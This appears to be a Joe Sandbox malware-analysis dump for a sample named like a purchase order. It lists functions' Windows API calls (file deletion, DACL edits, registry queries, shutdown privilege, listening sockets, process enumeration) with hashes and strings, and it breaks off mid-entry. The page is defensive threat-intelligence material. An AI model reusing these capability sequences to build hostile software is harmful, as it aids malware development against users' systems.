Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 3a2c9a6aaf35be69ba26c5ff023b5ee4197996e19917fcab632a4267b80a98a0
Instruction ID: 757039d77511fdd6ae09bc12e00ada087e6453de1558d342fa786dd75baaad1d
Opcode Fuzzy Hash: 3a2c9a6aaf35be69ba26c5ff023b5ee4197996e19917fcab632a4267b80a98a0
Instruction Fuzzy Hash: 5631D3329016196ACF10AFA1DC49BDF77B89F45325F1005A7EC11A21A1DB78EA89CB6C

Function 0044D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0044D0D8
__swprintf.LIBCMT ref: 0044D0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 0044D137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0044D15C
_memset.LIBCMT ref: 0044D17B
_wcsncpy.LIBCMT ref: 0044D1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0044D1EC
CloseHandle.KERNEL32(00000000), ref: 0044D1F7
RemoveDirectoryW.KERNEL32(?), ref: 0044D200
CloseHandle.KERNEL32(00000000), ref: 0044D20A

Strings

\??\%s, xrefs: 0044D0F4
:, xrefs: 0044D11B
\, xrefs: 0044D110

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: b68ac97a0bbf8f074f79a283de7a9c19f5e6387d087e4f1df6f20452fc066d1a
Instruction ID: b8dacc7318c57a54b8e1dcc07a6608e13ec8875f8ad1fe94d440b818e94b2f45
Opcode Fuzzy Hash: b68ac97a0bbf8f074f79a283de7a9c19f5e6387d087e4f1df6f20452fc066d1a
Instruction Fuzzy Hash: 1331B871900119ABDB21DFA1DC49FEF77BCEF88740F5040BAF909D11A1E77496458B28

Function 0043A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0043ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0043ABD7
Part of subcall function 0043ABBB: GetLastError.KERNEL32(?,0043A69F,?,?,?), ref: 0043ABE1
Part of subcall function 0043ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0043A69F,?,?,?), ref: 0043ABF0
Part of subcall function 0043ABBB: HeapAlloc.KERNEL32(00000000,?,0043A69F,?,?,?), ref: 0043ABF7
Part of subcall function 0043ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043AC0E

Part of subcall function 0043AC56: GetProcessHeap.KERNEL32(00000008,0043A6B5,00000000,00000000,?,0043A6B5,?), ref: 0043AC62
Part of subcall function 0043AC56: HeapAlloc.KERNEL32(00000000,?,0043A6B5,?), ref: 0043AC69
Part of subcall function 0043AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0043A6B5,?), ref: 0043AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0043A6D0
_memset.LIBCMT ref: 0043A6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0043A704
GetLengthSid.ADVAPI32(?), ref: 0043A715
GetAce.ADVAPI32(?,00000000,?), ref: 0043A752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0043A76E
GetLengthSid.ADVAPI32(?), ref: 0043A78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0043A79A
HeapAlloc.KERNEL32(00000000), ref: 0043A7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0043A7C2
CopySid.ADVAPI32(00000000), ref: 0043A7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0043A7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0043A820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0043A834

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 19c88d49b77f25d1d4edcb9946f7d701142184e577521806ced28fc7d34eebce
Instruction ID: 144342650f90ac67701e10cbe64f2ac991e70e4539ce56d8947383b5d4265896
Opcode Fuzzy Hash: 19c88d49b77f25d1d4edcb9946f7d701142184e577521806ced28fc7d34eebce
Instruction Fuzzy Hash: 2B516C71900209ABDF049F91DC84EEFBBB9FF09304F14812AE951AA290D739DA15CB69

Function 00406F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON

Download Yara Rule

Strings

LIMIT_RECURSION=, xrefs: 00482D7E
CR), xrefs: 00482E09
J, xrefs: 00406F77
CRLF), xrefs: 00482E43
BSR_UNICODE), xrefs: 00482EBA
UCP), xrefs: 00482C8F
ANYCRLF), xrefs: 00482E7D
UTF), xrefs: 00482C7C
LIMIT_MATCH=, xrefs: 00482CF2
BSR_ANYCRLF), xrefs: 00482EA0
ANY), xrefs: 00482E60
JJJ J, xrefs: 00407096, 0040709C
UTF16), xrefs: 00482C56
LF), xrefs: 00482E26
NO_START_OPT), xrefs: 00482CD1
NO_AUTO_POSSESS), xrefs: 00482CB0

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID: J$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$JJJ J
API String ID: 0-2551290072
Opcode ID: 7396a4921f9da90dd1aae6694be548c28df0cce0295820056248e47a2d119cc0
Instruction ID: 487dcb99b698c5f55c49da48b78915288c7c7a08838464614983928d51956754
Opcode Fuzzy Hash: 7396a4921f9da90dd1aae6694be548c28df0cce0295820056248e47a2d119cc0
Instruction Fuzzy Hash: ED72AF71E042198BDB24DF59C8807AEB7B5FF48710F10856BE805EB381DB789E81DB99

Function 004463F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00445FA6,?), ref: 00446ED8

Part of subcall function 004472CB: GetFileAttributesW.KERNEL32(?,00446019), ref: 004472CC

_wcscat.LIBCMT ref: 00446441
__wsplitpath.LIBCMT ref: 0044645F
FindFirstFileW.KERNEL32(?,?), ref: 00446474
_wcscpy.LIBCMT ref: 004464A3
_wcscat.LIBCMT ref: 004464B8
_wcscat.LIBCMT ref: 004464CA
DeleteFileW.KERNEL32(?), ref: 004464DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 004464EB
FindClose.KERNEL32(00000000), ref: 00446506

Strings

\*.*, xrefs: 0044643B

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: 207bf40969deb6b3d3afc2ff0a38490a33ffcbdb27faad35d926c948b6f8fdd0
Instruction ID: 73c7c28cc2d4d292303f02bb6a0fa5fbbca2d385feff7c8596e80d02910825b5
Opcode Fuzzy Hash: 207bf40969deb6b3d3afc2ff0a38490a33ffcbdb27faad35d926c948b6f8fdd0
Instruction Fuzzy Hash: 2231A2B2408384AAD721EFA498899DFB7DCAF56314F40092FF5D9C3142EA39D509876B

Function 004631BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00463C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046328E

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0046332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004633C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00463604
RegCloseKey.ADVAPI32(00000000), ref: 00463611

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: a539c27ee0bcb825059e141fc065cd09d999b375c9616f6f869982f7ad6543de
Instruction ID: dd98911054ea73e03f9d7df8a9ed958b0bc855eff2a36a34133799616501a85a
Opcode Fuzzy Hash: a539c27ee0bcb825059e141fc065cd09d999b375c9616f6f869982f7ad6543de
Instruction Fuzzy Hash: 29E15D71604200AFCB15DF29C991D2BBBE8EF89714F04896EF84AD72A1DB34ED05CB56

Function 00456D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00456D2E
EmptyClipboard.USER32 ref: 00456D34
GlobalAlloc.KERNEL32(00000002,?), ref: 00456D49
CloseClipboard.USER32 ref: 00456DE8

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: f37096166a4371ff03842f42e2ef56189ff75b6b6a6dbb0ea91bd807c9aff62a
Instruction ID: 0eb664db9bf6f2b7b87e2a178079bdaabe52376ddd736b46ec2ccd53d521ae62
Opcode Fuzzy Hash: f37096166a4371ff03842f42e2ef56189ff75b6b6a6dbb0ea91bd807c9aff62a
Instruction Fuzzy Hash: 4A219C317011149FDB00AF25DC49B6E77A8EF04711F05882EF90ADB2A2EB78EC558B9D

Function 0045C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00439ABF: CLSIDFromProgID.OLE32 ref: 00439ADC
Part of subcall function 00439ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00439AF7
Part of subcall function 00439ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00439B05
Part of subcall function 00439ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00439B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0045C235
_memset.LIBCMT ref: 0045C242
_memset.LIBCMT ref: 0045C360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0045C38C
CoTaskMemFree.OLE32(?), ref: 0045C397

Strings

NULL Pointer assignment, xrefs: 0045C3E5

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: ff54f6335ce909c2fa6b6827016a1c9ff4870014f764a5539af47b585deaf951
Instruction ID: 3356cdb51167e4131ddd78b1ce382775f49e2990c9d9fa9527947cf0618e9e45
Opcode Fuzzy Hash: ff54f6335ce909c2fa6b6827016a1c9ff4870014f764a5539af47b585deaf951
Instruction Fuzzy Hash: 5C912A71D00218AFDB10DF95DC81EDEBBB9AF08714F10816AF915B7282DB74AA45CFA4

Function 004479D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 0043B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0043B180
Part of subcall function 0043B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0043B1AD
Part of subcall function 0043B134: GetLastError.KERNEL32 ref: 0043B1BA

ExitWindowsEx.USER32(?,00000000), ref: 00447A0F

Strings

, xrefs: 004479FD
SeShutdownPrivilege, xrefs: 004479DD
@, xrefs: 00447A02

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 150bf5bed513d1e5835323409ad14a908b70762b92def566276f4d62423935ad
Instruction ID: b76ccdbae1f18d17e3ead188a27b602ad99dccb6f3d18fa98a9ade3249578edf
Opcode Fuzzy Hash: 150bf5bed513d1e5835323409ad14a908b70762b92def566276f4d62423935ad
Instruction Fuzzy Hash: 3901FC716592116BF7282664DC4BBBF735CD704345F24082BF943B21C2DB6C5E0282BE

Function 00458C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00458CA8
WSAGetLastError.WSOCK32(00000000), ref: 00458CB7
bind.WSOCK32(00000000,?,00000010), ref: 00458CD3
listen.WSOCK32(00000000,00000005), ref: 00458CE2
WSAGetLastError.WSOCK32(00000000), ref: 00458CFC
closesocket.WSOCK32(00000000,00000000), ref: 00458D10

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 3aef0437483132550f173dc779258cdeee6d1cdbee113925f016bea3584900cb
Instruction ID: 9606cfcbb7039ff7302cbb9cd038319eb674cde66eaf2361e726534cdc00523c
Opcode Fuzzy Hash: 3aef0437483132550f173dc779258cdeee6d1cdbee113925f016bea3584900cb
Instruction Fuzzy Hash: 6921E131A012009FCB10EF64C985A6EB3A9AF48315F10856EED16B73D2CB38AD498B59

Function 00446532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00446554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00446564
Process32NextW.KERNEL32(00000000,0000022C), ref: 00446583
__wsplitpath.LIBCMT ref: 004465A7
_wcscat.LIBCMT ref: 004465BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 004465F9

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 2d41c09dd81c2ae839535a0934c8672d61f7edfe20a8949431cfe49a907b3b17
Instruction ID: 5a10ba3f14c39411ad8ad50115d45b01add9c21422253e8f096218853a032e33
Opcode Fuzzy Hash: 2d41c09dd81c2ae839535a0934c8672d61f7edfe20a8949431cfe49a907b3b17
Instruction Fuzzy Hash: 7B219571900218BBEB10ABA4DC88FDEB7BCAB05300F5004AAE505D3241DB759F85CB65

Function 004413CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 004413DC

Strings

(, xrefs: 00441422
,2K, xrefs: 004416B1
|, xrefs: 0044140C
<2K, xrefs: 004416FA

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: lstrlen
String ID: ($,2K$<2K$|
API String ID: 1659193697-2182472957
Opcode ID: 524c958fd482d931795d13b601762ad0f23e08667b808a05e84820537726d62a
Instruction ID: b3f271005b524aebf8f91158433a8eea4ac4193e129ed65323c4eb9f1a4cf8f1
Opcode Fuzzy Hash: 524c958fd482d931795d13b601762ad0f23e08667b808a05e84820537726d62a
Instruction Fuzzy Hash: FF323675A007059FD728DF29C4809AAB7F0FF48310B15C56EE59ADB3A2E774E981CB48

Function 0045923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0045A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0045A84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00459296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 004592B9

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 38a9d122883346d3f8cb65db6244ab408325e3e1faa11902ac3d89c5ea658cdf
Instruction ID: f31afdfd231ffbce65f4c59d6c83f29495bd5957bcfb5fbfa73d0d0b248d16ca
Opcode Fuzzy Hash: 38a9d122883346d3f8cb65db6244ab408325e3e1faa11902ac3d89c5ea658cdf
Instruction Fuzzy Hash: 8641F570600104AFDB10AB24C842E7E77EDEF08328F04445EF956A73D3DB789D418B99

Function 0044EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0044EB8A
_wcscmp.LIBCMT ref: 0044EBBA
_wcscmp.LIBCMT ref: 0044EBCF
FindNextFileW.KERNEL32(00000000,?), ref: 0044EBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0044EC0E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 7decc0964aa9a0c18d0d93d071e471d8afd33c0129de16156793592e0011829b
